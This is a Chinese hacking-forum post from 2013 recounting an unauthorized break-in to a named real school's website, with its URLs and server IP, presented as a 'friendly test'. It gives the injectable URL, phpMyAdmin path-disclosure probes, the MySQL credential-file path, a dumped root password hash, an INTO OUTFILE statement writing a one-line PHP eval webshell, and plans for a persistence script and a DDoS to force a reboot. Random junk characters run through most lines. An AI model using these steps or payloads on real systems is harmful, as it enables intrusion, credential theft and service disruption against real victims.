找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2904|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
% ~$ R( _% u3 t, ^( l# t发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
4 q/ t- d. ?7 D4 w; w5 ]+ N7 W$ ~9 l2 j7 C
: Z5 G2 y7 X! }2 T' w1 m
; b0 N! ?" ?8 y% {2 L
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 4 h3 A6 [9 @0 l& w# ^/ Z
1 `. T5 k& N' R3 r+ ]* `. [
那么想可以直接写入shell ,getshell有几个条件:* z, @. O8 h) t, M8 W) N
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
, ~! P1 ^4 Z7 P% \/ S) _5 O  h- j
试着爆绝对路径:
/ q/ Q$ v3 r# ^8 |9 i' `5 r/ Q1./phpMyAdmin/index.php?lang[]=1  8 u/ p# C' K  _7 Q. t
2./phpMyAdmin/phpinfo.php  
6 `$ L2 R( M, @: ^5 y3./load_file()  
0 ^6 c6 G5 M1 Q+ S, l6 N! I4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
  `4 m& R. P+ E1 g: _5./phpmyadmin/libraries/select_lang.lib.php  7 e3 t3 k6 h% y% n& G" |. m
6./phpmyadmin/libraries/lect_lang.lib.php  $ |- F0 a1 |' z- d, Z
7./phpmyadmin/libraries/mcrypt.lib.php   
$ x; T) F. D6 I3 y2 Y; @8./phpmyadmin/libraries/export/xls.php  
& D5 {$ V3 {1 m" S6 s& v1 j
, B1 X' C5 r. j, l均不行...........................
$ w3 `5 l7 A8 h/ r1 o5 V$ U: {/ \4 k
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
% v# A4 e3 }8 ^
1 V+ V# Z( i% _1 b) H" i3 I. F权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
$ M' j) i. ~  b5 ?# N2 }7 o
. F" O4 F7 P3 f1 N7 |9 I默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
% c' W8 n7 M( G+ m( \
) w( n( m2 c; q) B敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........5 J' u9 C6 c5 n" P, I! P

7 c3 R% w# i% l% k% G想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
+ h/ B. k$ @$ ~% Q
! P1 }3 G7 s" c5 ~% |  L7 ^http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
  B9 \! d, L) X& s3 P& w  U/ n% S1 w
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
8 u# d$ B7 J( l, T+ Z' o3 c0 L, k: X5 f: j2 b2 D
成功读到root密码:
2 p- x& I" h1 z/ p
& z" S+ x4 D( e8 f& J- F8 P: y17---- r(0072)
0 s: F4 k# x7 ~& b% z: P18---- o(006f)
# X. S# |! e4 O/ a# t# c& `19---- o(006f)3 D3 p: U# f" r/ w3 ]
20---- t(0074)' b. V: k1 b+ ~5 I
21---- *(002a)
, \7 w: b) d# t9 @0 q7 P, Y22---- 8(0038)
% o" a' o5 t, B/ y23---- 2(0032)1 [4 N% ~: J% b7 ~+ W
24---- E(0045)& @$ S$ F9 j# P9 l# \" `
25---- 1(0031): C3 m6 K: y7 Z7 ^  o! k
26---- C(0043)& u+ f2 g4 g* H4 g
27---- 5(0035)+ Q, @6 |. c* q) m: Y) L0 n! a
28---- 8(0038)
* o2 B& l3 ]& h- J: {29---- 2(0032)! G- Z# z+ P7 H9 k/ Y6 ~, C# C
30---- 8(0038)
* |6 h, R$ `" c31---- A(0041)- t: G/ v* ^- e; w: b9 }& a
32---- 9(0039)
% G8 ?( n9 e+ a$ e7 S33---- B(0042); W. ?) g. }6 Q; C; H0 c
34---- 5(0035)& C: J; P% v$ u: J
35---- 4(0034)4 D) q8 A/ v" y
36---- 8(0038)
$ N0 y8 ?3 c) M  |37---- 6(0036)
% s/ j) y/ q" t% Q. C/ w( O38---- 4(0034)2 S1 V3 e0 W5 A6 `
39---- 9(0039)4 i0 h7 G5 E: \0 Z
40---- 1(0031)0 p- D5 f- U/ Y2 Q9 V2 g
41---- 1(0031)
/ M2 b$ Q# g) S) D& }42---- 5(0035)
7 e& T+ Z; Y. I4 h; F3 S43---- 3(0033)4 `; K' O$ c2 \) w  i7 g& [
44---- 5(0035)1 o2 o* Z. J& N8 l1 R0 D
45---- 9(0039): U. @  `3 `% C
46---- 8(0038)
5 w% f0 S. v0 S9 d8 s( o47---- F(0046)/ \; {5 [, B0 q, W
48---- F(0046): _" S1 ~9 u$ x0 [1 C. p% W
49---- 4(0034)1 `: r1 Q4 q* l5 I9 P  h$ _/ J# N
50---- F(0046)
( X$ C4 Z! J; O0 R51---- 0(0030)6 a5 C+ h) b+ q# W0 B& P( u( f5 \
52---- 3(0033)9 N2 R/ \2 O0 {( v% O  p
53---- 2(0032)% P: e! F  E+ q. D" X) H7 a
54---- A(0041)
% c! g. v& Y' C1 w( ~" {55---- 4(0034)9 v4 O& P2 Z" h! x
56---- A(0041)2 ^! I1 i3 F6 E2 E! P! P, t% n
57---- B(0042)" Y( y2 g$ T5 N$ ^8 _3 L
58---- *(0044). H6 V, w, j3 ^
59---- *(0035)
. y3 U7 g! [1 D/ Q2 E: I+ j2 v) N60---- *(0041)* n4 ?( h* e) `4 Z
61---- *0032)$ K* Q% ~% ?9 Y, [! s* w0 _
0 d1 i6 j4 T/ S  m' s# b$ A9 _
解密后成功登陆phpmyamin
, t* t6 A3 A7 `                          + L' H. ?. H) y) H6 m
6 T' `& b5 B6 ]1 ^7 f. L
                             
/ Y7 q4 u. ~$ }0 O5 F) ~( n8 r5 v2 L$ N' `/ B9 D6 Z
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
( X# ^6 ?3 l/ L9 F9 c( t
! w  S3 M0 j2 I$ f: O+ m成功执行,拿下shell,菜刀连接:# \) c! ~1 D/ d% R/ x8 m4 {0 V3 h
4 u) }9 F' v3 c4 u! G; H
服务器不支持asp,aspx,php提权无果...................# w7 f( I1 n8 e' J, G& L
: t: g7 U6 }, m) `( u( k
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:8 y0 ?6 L+ i1 v
服务器上已经有个隐藏帐号了
& L, Z. F5 _1 N1 n+ X5 _/ K
别名     administrators
  u" k6 d+ A, z' K1 X6 E4 C注释     管理员对计算机/域有不受限制的完全访问权
8 n- F# Y8 G4 n7 J+ b3 X; W
成员
/ i- b& e$ z: l9 l5 F6 e
-------------------------------------------------------------------------------
  U& Z$ R: D" x4 s% Iadmin! p) b& Y. d1 h8 h' h: a7 w2 o
Administrator
; {6 _- _/ |. U$ t  v& nslipper$, h' H; ]+ w) v# I) l$ \) F3 Z9 t
sqluser. I9 M8 q4 j1 y* v7 |
命令成功完成。
  ]7 `. n) x( U( q: [3 {9 J8 b( U7 i
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。! x. C) Y) ~4 u0 Y! O/ X  U' \
$ g' O2 k- i& ?9 m9 f1 r: [. v# @
ddos服务器重启,不然就只能坐等服务器重启了...............................6 Z- d7 A6 N6 P1 {# `# i
! W/ e$ ^4 _- o4 \, ^' e
      

. v1 g+ T: K* [  L. Z& ?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表